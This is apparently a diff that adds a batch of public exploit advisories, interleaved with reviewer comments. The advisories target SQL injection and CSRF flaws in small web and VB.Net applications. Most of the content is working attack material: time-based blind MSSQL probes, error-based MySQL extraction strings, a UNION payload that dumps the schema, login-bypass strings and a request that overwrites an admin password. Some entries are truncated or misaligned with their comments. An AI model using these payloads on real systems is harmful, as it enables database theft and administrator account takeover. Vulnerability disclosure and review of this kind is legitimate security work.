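Review bot: The quoted source line `#20 $check_feedback_no="select * from batch_master where batch_id='".$_POST['']."'";` has an empty `$_POST['']` key, so as written it does not show the `batch_name` injection point the title names; the PHP 7 variant of the same file later in this commit (`exploits/php/webapps/45707.txt`) quotes the same line as `$_POST['batch_name']`, which suggests a transcription error here that should be corrected. `# Version: Php 5.6` (and `# Version: Php 7` in 45707) records the PHP runtime rather than an application version, while the commit title treats 5.6 and 7 as product versions; the header should say which it is. The five requests exercise `batch_name`, `b_name`, `sem_name`, `division` and `roll_no`, all concatenated into the query on the quoted line 25, which a one-line summary could state so that the title's single parameter is not read as the only one. The remediation is the same for every parameter: `mysqli`/PDO prepared statements with bound parameters instead of splicing `$_POST` values into the SQL string.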
@@ -0,0 +1,24 @@
+# Exploit Title: Grapixel New Media 2 - 'pageref' SQL Injection
+# Exploit Author: Berk Dusunur
+# Google Dork: N/A
+# Type: Web App
+# Date: 2018-10-26
+# Vendor Homepage: http://www.grapixel.com
+# Software Link: http://www.grapixel.com
+# Affected Version: v2
+# Tested on: MacosX
+# CVE : N/A
+
+#Proof Of Concept
+# Time-Based sql injection is called a data extraction event with request response times
+# with the server when there is no other way for it to extract aggressive data. It should
+# be determined by sql injection type. I discovered blind time-based sql injection.
+# Because single quotes didn't break the page structure, so I tried to get results
+# using waitfor delay instead.
+
+http://target/pages.aspx?pageref=[SQL]
+http://target/pages.aspx?pageref=' waitfor delay '00:00:05'--;
+http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>80) WAITFOR DELAY '0:0:5'--
+http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>81) WAITFOR DELAY '0:0:5'--
+
+Ascii equivalent of 80,81 figures The first database, wait 5 seconds if the first letter is "p"
\ No newline at end of file
diff --git a/exploits/php/webapps/45707.txt b/exploits/php/webapps/45707.txt
new file mode 100644
index 000000000..a595215db
--- /dev/null
+++ b/exploits/php/webapps/45707.txt
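Review bot: The file is placed under `exploits/php/webapps/`, but the target is `pages.aspx` and the payloads use `WAITFOR DELAY` and `DB_NAME()`, which are Microsoft SQL Server / ASP.NET constructs, so neither the path nor `# Type: Web App` identifies the platform; `exploits/aspx/webapps/` would match the request shown. `# Software Link:` merely repeats the vendor homepage and `# Affected Version: v2` names no product build, so a reader cannot tell whether a given deployment is affected. The closing sentence (`Ascii equivalent of 80,81 figures ...`) is hard to follow; what the two `IF(UNICODE(...))>80` / `>81` requests show is that the 5-second delay fires only for the comparison that holds, which brackets the character code of the first letter of the database name, and the text should say that plainly. A remediation line, parameterising `pageref` in the `pages.aspx` query, and the observation that probes of this shape appear in web-server logs as a burst of requests to `pages.aspx` with multi-second response times would make the entry useful on the defending side.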
@@ -0,0 +1,147 @@
+# Exploit Title: Open Faculty Evaluation System 7 - 'batch_name' SQL Injection
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://openfacultyeval.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/openfacultyeval/files/feedback_php7.zip/download
+# Version: Php 7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+/[PATH]/submit_feedback.php
+#....
+#15 include("includes/config_db.php");
+#16
+#17 if(isset($_POST['submit']))
+#18 {
+#19 //feedback no
+#20 $check_feedback_no="select * from batch_master where batch_id='".$_POST['batch_name']."'";
+#21 $res_feedback_no=mysqli_query($conn, $check_feedback_no) or die(mysqli_error($conn));
+#22 $result=mysqli_fetch_array($res_feedback_no);
+#23
+#24
+#25 $sql="select * from feedback_master where roll_no='".$_POST['roll_no']."' and b_id='".$_POST['b_name']."' and f_id='".$_POST['fac_name']."' and sub_id='".$_POST['sub_name']."' and sem_id='".$_POST['sem_name']."' and batch_id='".$_POST['batch_name']."' and division_id='".$_POST['division']."' and feedback_no='".$result['feedback_no']."'";
+#26 //echo $sql;
+#27 $res=mysqli_query($conn, $sql) or die(mysqli_error($conn));
+#28
+#29 //echo mysqli_num_rows($res);
+#30 //exit;
+#31 if(mysqli_num_rows($res)>=1)
+#32 {
+#....
+
+# POC:
+# 1)
+# http://localhost/[PATH]/submit_feedback.php
+#
+POST /[PATH]/submit_feedback.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 282
+batch_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 00:42:01 GMT
+Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
+X-Powered-By: PHP/7.1.22
+Content-Length: 311
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/submit_feedback.php
+#
+POST /[PATH]/submit_feedback.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 278
+b_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 00:58:04 GMT
+Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
+X-Powered-By: PHP/7.1.22
+Content-Length: 1315
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 3)
+# http://localhost/[PATH]/submit_feedback.php
+#
+POST /[PATH]/submit_feedback.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 280
+sem_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 00:58:15 GMT
+Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
+X-Powered-By: PHP/7.1.22
+Content-Length: 1313
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 4)
+# http://localhost/[PATH]/submit_feedback.php
+#
+POST /[PATH]/submit_feedback.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 280
+division=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 00:58:26 GMT
+Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
+X-Powered-By: PHP/7.1.22
+Content-Length: 1313
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 5)
+# http://localhost/[PATH]/submit_feedback.php
+#
+POST /[PATH]/submit_feedback.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 279
+roll_no=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 00:58:33 GMT
+Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
+X-Powered-By: PHP/7.1.22
+Content-Length: 1314
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45713.txt b/exploits/php/webapps/45713.txt
new file mode 100644
index 000000000..5e43e53e1
--- /dev/null
+++ b/exploits/php/webapps/45713.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/janobe
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit
+#
+POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 106
+USERID=1&UNAME=Anonymous&USERNAME=admin&deptid=&UPASS=Efe&ROLE=Administrator&deptid=&PHONE=912856478&save=
+HTTP/1.1 200 OK
+Date: Sun, 28 Oct 2018 20:16:05 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 57
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45717.txt b/exploits/php/webapps/45717.txt
new file mode 100644
index 000000000..6f77e2d96
--- /dev/null
+++ b/exploits/php/webapps/45717.txt
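Review bot: The PoC for this CSRF entry is only an authenticated POST carrying the tester's own PHPSESSID and never shows the cross-origin vector, so nothing in the file demonstrates that `admin/mod_users/controller.php?action=edit` accepts a forged request from another origin. I would add a line after `# 1)` naming what the handler lacks, e.g. `# controller.php?action=edit applies the POST with no anti-CSRF token and no Origin/Referer check`, and quote the controller lines the way 45724 in this commit does. The body also sends `deptid=` twice; if that is deliberate it deserves a note. The Software Link (tubigangarden.zip) is the same archive 45728 cites under the product name "PayPal/Credit Card/Debit Card Payment", so the two titles presumably should agree.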
@@ -0,0 +1,11 @@
+# Exploit Title: MOGG web simulator Script - SQL Injection
+# Date: 2018-10-29
+# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce -
+@dorsateam
+# Vendor Homepage: https://github.com/spider312/mtgas
+# Version: All Version
+
+
+Exploit :
+http://server/play.php?id=99999'+[SQL Command]+#
+http://server/play.php?id=99999%27+and+extractvalue(1,concat(0x3a,user(),0x3a))%23
\ No newline at end of file
diff --git a/exploits/php/webapps/45718.txt b/exploits/php/webapps/45718.txt
new file mode 100644
index 000000000..94f4d6b6b
--- /dev/null
+++ b/exploits/php/webapps/45718.txt
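Review bot: `# Version: All Version` gives a maintainer nothing to compare against, and the entry never names the line in `play.php` where `id` reaches the query, so nobody can confirm from this file whether a given checkout of the GitHub project is affected. I would replace it with the revision actually tested, e.g. `# Version: tested at commit <COMMIT-ID>` (placeholder), and add a `#[PATH]/play.php` excerpt in the style used by the other entries in this commit. The `# Tested on` and `# CVE` header fields that every other advisory here carries are also missing.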
@@ -0,0 +1,56 @@ +# Exploit Title: Aplaya Beach Resort Online Reservation System 1.0 - Multiple Vulnerabilities +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/aplaya.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit +# +POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 114 +account_id=5&name=Janno%2BPalacios&deptid=&username=efe%40omerefe.com&deptid=&pass=efe&type=Administrator&save= +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 08:20:21 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=7v7av68r870gj66ouhf1sk3260; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 57 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/admin/mod_room/controller.php?action=editimage +# + + +
+ + +
+ + + +# POC: +# 3) +# http://localhost/[PATH]/admin/mod_room/index.php?view=view&id=[SQL] +# +#.... \ No newline at end of file diff --git a/exploits/php/webapps/45719.txt b/exploits/php/webapps/45719.txt new file mode 100644 index 000000000..27261207c --- /dev/null +++ b/exploits/php/webapps/45719.txt 
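Review bot: The PoC 1 request to `admin/mod_users/controller.php?action=edit` carries no Cookie header while the response issues a fresh `Set-Cookie: PHPSESSID=...`, which suggests the admin account was rewritten with no session at all — a missing authorization check rather than (or in addition to) CSRF — and the entry should state which it is. PoC 2 (`mod_room/controller.php?action=editimage`) consists of a URL followed by blank lines and PoC 3 stops at `id=[SQL]` with `#....`, so neither is reproducible from the file as committed; the HTML form for PoC 2 may have been lost on import and is worth checking. The title says "Multiple Vulnerabilities" while the commit message calls it "SQL Injection / Cross-Site Request Forgery"; naming the issue type under each `# POC:` would reconcile the two.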
@@ -0,0 +1,119 @@ +# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip +# Version: 1.0 +# Category: Windows +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18803 + +# POC: +# 1) +# User: 'or 1=1 or ''=' +# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe + +# POC: +# 2) +# User: 'or 1=1 or ''=' +# Pass: Null +# +# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png + +#[PATH]/frmCourse.vb +#.... +#47 Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged +#48 sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'" +#49 reloadDtg(sql, dtglist) +#50 End Sub +#.... + +#[PATH]/includes/user.vb +#.... 
+#05 Public Sub login(ByVal username As Object, ByVal pass As Object) +#06 Try +#07 +#08 con.Open() +#09 reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')") +#10 +#11 +#12 If dt.Rows.Count > 0 Then +#13 If dt.Rows(0).Item("UserType") = "Administrator" Then +#14 MsgBox("Welcome " & dt.Rows(0).Item("UserType")) +#15 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname") +#16 With Form1 +#17 .tsAddG.Enabled = True +#18 .tsStudent.Enabled = True +#19 .tsCurriculum.Enabled = True +#20 .tsGrades.Enabled = True +#21 .tsReport.Enabled = True +#22 .tsUtilities.Enabled = True +#23 .tsSearchStudent.Enabled = True +#24 .tsLogin.Image = My.Resources.logout +#25 .tsLogin.Text = "Logout" +#26 End With +#27 +#28 +#29 LoginForm1.Close() +#30 +#31 +#32 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then +#33 +#34 MsgBox("Welcome " & dt.Rows(0).Item("UserType")) +#35 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname") +#36 With Form1 +#37 .tsAddG.Enabled = True +#38 .tsStudent.Enabled = True +#39 .tsCurriculum.Enabled = True +#40 .tsGrades.Enabled = True +#41 .tsReport.Enabled = True +#42 .tsSearchStudent.Enabled = True +#43 .tsLogin.Image = My.Resources.logout +#44 .tsLogin.Text = "Logout" +#45 End With +#46 +#47 +#48 +#49 +#50 LoginForm1.Close() +#51 +#52 +#53 +#54 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then +#55 MsgBox("Welcome " & dt.Rows(0).Item("UserType")) +#56 'With Form1 +#57 With Form1 +#58 .tsAddG.Enabled = True +#59 .tsStudent.Enabled = True +#60 .tsCurriculum.Enabled = True +#61 .tsGrades.Enabled = True +#62 .tsReport.Enabled = True +#63 +#64 .tsSearchStudent.Enabled = True +#65 .tsLogin.Image = My.Resources.logout +#66 .tsLogin.Text = "Logout" +#67 End With +#68 +#69 +#70 LoginForm1.Close() +#71 End If +#72 +#73 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId") +#74 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname") +#75 'Form1.StatusStrip1.Visible = True +#76 'inserting logs 
+#77 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _ +#78 ' " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')" +#79 'create(sql) +#80 +#81 Else +#82 MsgBox("Acount doest not exist!", MsgBoxStyle.Information) +#83 End If +#84 Catch ex As Exception +#85 MsgBox(ex.Message) +#86 End Try +#87 con.Close() +#88 da.Dispose() +#89 End Sub +#.... \ No newline at end of file diff --git a/exploits/php/webapps/45720.txt b/exploits/php/webapps/45720.txt new file mode 100644 index 000000000..dfc9638db --- /dev/null +++ b/exploits/php/webapps/45720.txt 
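Review bot: This advisory, and likewise 45720 and 45721 in the next two hunks, describes a VB.Net desktop application with `# Category: Windows`, yet all three are committed under `exploits/php/webapps/`, so the path contradicts the category and the entries will be indexed as PHP web issues. The quoted `login` sub concatenates `username` and `pass` into the SQL string at excerpt line 09, which is the actual defect; a remediation line such as `# Fix: bind username/pass as command parameters instead of concatenating them into the SELECT` would make the excerpt useful to the project maintainer. The `# Pass: Null` wording in PoC 2 is ambiguous (empty string versus the literal text); spelling out what was submitted would help reproduction.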
@@ -0,0 +1,73 @@
+# Exploit Title: Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/janobe
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bakeshopinventory1.0.zip
+# Version: 1.0
+# Category: Windows
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-18804
+
+# POC:
+# 1)
+# User: 'or 1=1 or ''='
+# Pass: 'or 1=1 or ''='
+#
+# https://2.bp.blogspot.com/-xjiRUlpkNGc/W9Ywmp79JpI/AAAAAAAAENs/3UDWxFvuTfcJrEKDU9TUxJRpoT8T6yLLwCLcBGAs/s1600/sql4.png
+#
+#[PATH]/include/publicfunction.vb
+#....
+#237 Public Sub LoginUser(ByVal userid As Object, ByVal pass As Object)
+#238 Try
+#239 con.Open()
+#240
+#241 cmd = New OleDb.OleDbCommand
+#242 With cmd
+#243 .Connection = con
+#244 .CommandText = "SELECT * FROM tblUser WHERE U_UNAME ='" & userid.Text & "' AND U_PASS = '" & pass.Text & "'"
+#245 End With
+#246
+#247 da = New OleDb.OleDbDataAdapter
+#248 da.SelectCommand = cmd
+#249 dt = New DataTable
+#250 da.Fill(dt)
+#251
+#252 If dt.Rows.Count > 0 Then
+#253
+#254 If dt.Rows(0).Item("U_TYPE") = "Administrator" Then
+#255
+#256 MsgBox("You login as administrator!!")
+#257
+#258 ShowForm(LoginForm1, Form1)
+#259
+#260
+#261 LoginForm1.Hide()
+#262 ElseIf dt.Rows(0).Item("U_TYPE") = "Staff" Then
+#263
+#264 MsgBox("You login as Staff!!")
+#265
+#266 With Form1
+#267 '.ManageUsersToolStripMenuItem.Visible = False
+#268
+#269 End With
+#270
+#271 ShowForm(LoginForm1, Form1)
+#272
+#273
+#274 LoginForm1.Hide()
+#275 End If
+#276
+#277 Else
+#278 MsgBox("Account does not exists.", MsgBoxStyle.Exclamation)
+#279 End If
+#280
+#281 Catch ex As Exception
+#282
+#283 MsgBox(ex.Message)
+#284 Finally
+#285 con.Close()
+#286 da.Dispose()
+#287 End Try
+#288 End Sub
+#....
\ No newline at end of file
diff --git a/exploits/php/webapps/45721.txt b/exploits/php/webapps/45721.txt
new file mode 100644
index 000000000..45e986462
--- /dev/null
+++ b/exploits/php/webapps/45721.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/janobe
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/poinofsales_0.zip
+# Version: 1.0
+# Category: Windows
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-18805
+
+# POC:
+# 1)
+# User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||'
+# Pass: Null
+#
+# https://2.bp.blogspot.com/-qlfhS-GUaCQ/W9Yt3aHdLHI/AAAAAAAAENg/Hmxj2lZ62cYITPlTNaNrwwAgh379Cbi8ACLcBGAs/s1600/sql3.png
+#
+#[PATH]/LoginForm1.vb
+#....
+#11 Private Sub OK_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles OK.Click
+#12 sql = "SELECT * FROM `tblemployee` WHERE `USERNAME` ='" & UsernameTextBox.Text & "' and `PASSWRD` = sha1('" & PasswordTextBox.Text & "')"
+#13 janobefindthis(sql)
+#14
+#15 If GetNumRows() = 1 Then
+#16 LoadSingleResult("login")
+#17 ' MsgBox(fullname)
+#18 Form1.statsloginname.Text = fullname
+#19 Form1.tsLogin.Text = "Logout"
+#20
+#21 If usertype = "Administrator" Then
+#22 Visible_Admin(True)
+#23 Else
+#24 Visible_Cashier(True)
+#25 End If
+#26 Else
+#27 MsgBox("Username or Password not registered!")
+#28 End If
+#29
+#30
+#31 Me.Close()
+#32 End Sub
+#....
\ No newline at end of file
diff --git a/exploits/php/webapps/45722.txt b/exploits/php/webapps/45722.txt
new file mode 100644
index 000000000..d6bb35273
--- /dev/null
+++ b/exploits/php/webapps/45722.txt
@@ -0,0 +1,108 @@ +# Exploit Title: School Event Management System 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18795 + +# POC: +# 1) +# http://localhost/[PATH]/student/index.php?view=view&id=[SQL] +# +#[PATH]/student/view.php +#01 select_student($_GET['id']); +#04 +#05 +#06 $course = New Course(); +#07 $resCourse = $course->single_course($res->CourseID); +#08 +#09 ?> +GET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:02:29 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=82 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# 
http://localhost/[PATH]/event/index.php?view=view&id=[SQL] +# +#[PATH]/event/view.php +#01 single_event($_GET['id']); +#04 +#05 +#06 +#07 ?> +GET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:12:15 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT 